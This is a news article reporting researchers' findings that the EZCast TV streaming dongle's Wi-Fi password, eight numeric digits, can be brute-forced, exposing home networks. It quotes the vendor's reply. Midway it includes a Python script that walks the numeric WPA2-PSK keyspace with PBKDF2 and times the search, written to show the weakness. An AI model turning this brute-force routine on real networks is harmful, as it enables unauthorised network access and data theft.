TV streaming stick brings the movies and the network backdoors

EZCast password susceptible to brute-force attack – report


Vulnerabilities in the EZCast TV streaming stick could allow an attacker to take full control of home networks, steal data and plant bots, researchers at security firm Check Point have warned. The device's flaws effectively hand over a root shell on the dongle and, through it, a foothold on the network in the user's home or office.

EZCast is an HDMI dongle that turns an ordinary TV into a smart TV, letting users connect it to the internet and other media sources. The device is controlled from either a smartphone app or a PC.

The stick, which has five million users worldwide, also allows users to easily connect a TV to a PC to view and transfer videos, photos, music and files.

The EZCast dongle runs its own Wi-Fi network, secured only by an eight-digit numeric password, a keyspace of just 100 million possibilities. Check Point's researchers found that this credential can be recovered with a brute-force attack; once in, an attacker has access to the associated network.
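To show why eight digits is too few, here is an added example (not Check Point's or EZCast's code) that walks the numeric keyspace against a WPA2-PSK key derivation and measures the cost. It assumes the dongle uses WPA2-PSK, as the vendor's response quoted later in this article states, so the pairwise master key is PBKDF2-HMAC-SHA1 over the passphrase with the SSID as salt; the SSID, the victim passphrase and the "known PMK" oracle are constructed for the demo. In a real attack the candidate is verified against the MIC of a captured 4-way handshake (or a PMKID) rather than against a known PMK, but the per-guess cost, which is what matters here, is the same.

```python
"""
Added example: cost of brute-forcing an 8-digit numeric WPA2-PSK passphrase.

Assumptions (labelled): WPA2-PSK, so PMK = PBKDF2-HMAC-SHA1(passphrase, SSID,
4096 rounds, 32 bytes). SSID and victim passphrase are constructed for the demo;
candidates are checked against a known PMK instead of a captured handshake MIC
so the script runs offline with no packet capture.
"""
import hashlib
import hmac
import math
import time
from typing import Optional

ITERATIONS = 4096          # fixed by IEEE 802.11i for WPA/WPA2-PSK
PMK_LEN = 32
DIGITS = 8
KEYSPACE = 10 ** DIGITS    # 00000000 .. 99999999 -> 100,000,000 candidates

SSID = b"EZCast-demo"      # constructed SSID, used as the PBKDF2 salt


def wpa2_pmk(passphrase: str, ssid: bytes = SSID) -> bytes:
    """Derive the WPA2-PSK pairwise master key from passphrase and SSID."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid, ITERATIONS, PMK_LEN)


def crack_numeric_psk(target_pmk: bytes, start: int = 0,
                      limit: int = KEYSPACE, ssid: bytes = SSID) -> Optional[str]:
    """Walk the numeric keyspace in order; return the passphrase or None.

    `start`/`limit` bound the search so the demo finishes quickly; a real
    attacker walks all 10**8 candidates, usually split across GPUs.
    """
    for n in range(start, min(start + limit, KEYSPACE)):
        candidate = f"{n:0{DIGITS}d}"
        if hmac.compare_digest(wpa2_pmk(candidate, ssid), target_pmk):
            return candidate
    return None


def guesses_per_second(sample: int = 50) -> float:
    """Measure single-threaded PBKDF2 throughput on this machine."""
    t0 = time.perf_counter()
    for n in range(sample):
        wpa2_pmk(f"{n:0{DIGITS}d}")
    return sample / (time.perf_counter() - t0)


def full_search_seconds(rate: float, keyspace: int = KEYSPACE) -> float:
    """Worst-case time to exhaust the keyspace at `rate` guesses per second."""
    return keyspace / rate


def entropy_bits(alphabet_size: int, length: int) -> float:
    """Entropy of a uniformly random passphrase of this alphabet and length."""
    return length * math.log2(alphabet_size)


if __name__ == "__main__":
    # Constructed victim passphrase; the attacker only ever sees target_pmk.
    target_pmk = wpa2_pmk("00000042")
    print("recovered:", crack_numeric_psk(target_pmk, limit=1000))

    rate = guesses_per_second()
    print(f"{rate:,.0f} PBKDF2 guesses/s on one core -> "
          f"{full_search_seconds(rate) / 3600:.1f} h to exhaust all 10^8")

    print(f"8 digits: {entropy_bits(10, 8):.1f} bits; "
          f"12 random alphanumerics: {entropy_bits(62, 12):.1f} bits")
```

The numbers tell the story: an eight-digit numeric PSK carries about 26.6 bits of entropy, and even with PBKDF2's 4096 rounds per guess a single CPU core can exhaust the space in hours, while GPU crackers need far less. The attacker has to be within radio range once to capture a handshake; everything after that is offline and invisible to the dongle. The fix is a long random passphrase from a large alphabet (12 alphanumerics is already over 70 bits), which puts the same search out of reach.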

The vulnerabilities leave all information stored on users’ personal networks exposed to potential theft. As a result, all sorts of potentially sensitive information including tax returns, bank statements, and credit cards might be up for grabs by identity thieves and cyber-criminals.

The Check Point team found other serious vulnerabilities in the same device last year. It has tried to contact EZCast several times since first discovering the flaws in July 2015, but no fix has been released for the device.

The EZCast dongle is marketed by China-based Visonicom. El Reg put out a request for comment on Check Point's research to Visonicom and will update this story as and when we hear more. ®

EZCast got in touch to comment: "Any Wi-Fi [device] comes with security problem[s]. I'm not sure how many people [have a] fondness [for] hacking [their] neighbour's Wi-Fi. After all, the dongle encryption is WPA2, though the password is 8 digits. Why don't these guys mention the hackers can hack the WLAN [through] the Wi-Fi signal from a PC or mobile phone Wi-Fi dongle/module? It should [be even] easier."
